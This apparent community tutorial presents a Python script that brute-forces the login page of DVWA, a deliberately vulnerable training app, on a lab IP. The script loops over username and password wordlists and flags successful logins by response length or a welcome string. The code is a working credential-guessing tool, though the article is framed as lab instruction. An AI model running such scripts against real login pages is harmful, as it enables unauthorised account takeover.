BestHub
Sign in
Information Security 5 min read

Python Script for Brute‑Force Login on DVWA Using HTTP GET Requests

This article demonstrates how to use a Python script to perform a brute‑force attack against the DVWA login page by sending HTTP GET requests with custom headers and payloads, iterating over username and password dictionaries, recording response status, content length, and saving results to CSV or TXT files.

Python Programming Learning Circle
Python Programming Learning Circle
Python Programming Learning Circle
Python Script for Brute‑Force Login on DVWA Using HTTP GET Requests

The tutorial explains how to target the DVWA (Damn Vulnerable Web Application) brute‑force module at low and medium security levels using a Python script that sends GET requests to the login URL.

Key code explanations include setting the target URL, defining request headers, and constructing the payload dictionary with username , password , and a Login field.

Example URL assignment:

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"

Headers are defined as:

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}

The payload is built like:

payload = {'username': username, 'password': password, "Login": 'Login'}

A GET request is sent and the response is stored in Response :

Response = requests.get(url, params=payload, headers=header)

The script then records the HTTP status code and the length of the response content, concatenating these values with the username and password, and writes each line to a CSV file.

result = str(Response.status_code) + ',' + username + ',' + password + ',' + str(len(Response.content))
f.write(result + '\n')

Method One writes the collected data (status code, username, password, packet length) to result.csv and uses the difference in packet length to infer successful logins.

import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header = {...}
f = open('result.csv','w')
f.write('状态码,用户名,密码,包长度\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username':username,'password':password,"Login":'Login'}
        Response = requests.get(url, params=payload, headers=header)
        result = str(Response.status_code) + ',' + username + ',' + password + ',' + str(len(Response.content))
        f.write(result + '\n')
print('\n完成')

Method Two checks the response text for the phrase "Welcome to the password protected area" to determine a successful login and writes the valid credentials to result.txt .

if not(Response.text.find('Welcome to the password protected area') == -1):
    result = username + ':' + password
    print(result)
    f.write(result + '\n')
print('\n完成')

The article includes screenshots of the script output, the captured HTTP packets, and the final results, illustrating how differing packet lengths correspond to successful versus failed login attempts.

PythonAutomationHTTPWeb SecurityBrute ForceDVWA
Python Programming Learning Circle
Written by

Python Programming Learning Circle

A global community of Chinese Python developers offering technical articles, columns, original video tutorials, and problem sets. Topics include web full‑stack development, web scraping, data analysis, natural language processing, image processing, machine learning, automated testing, DevOps automation, and big data.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment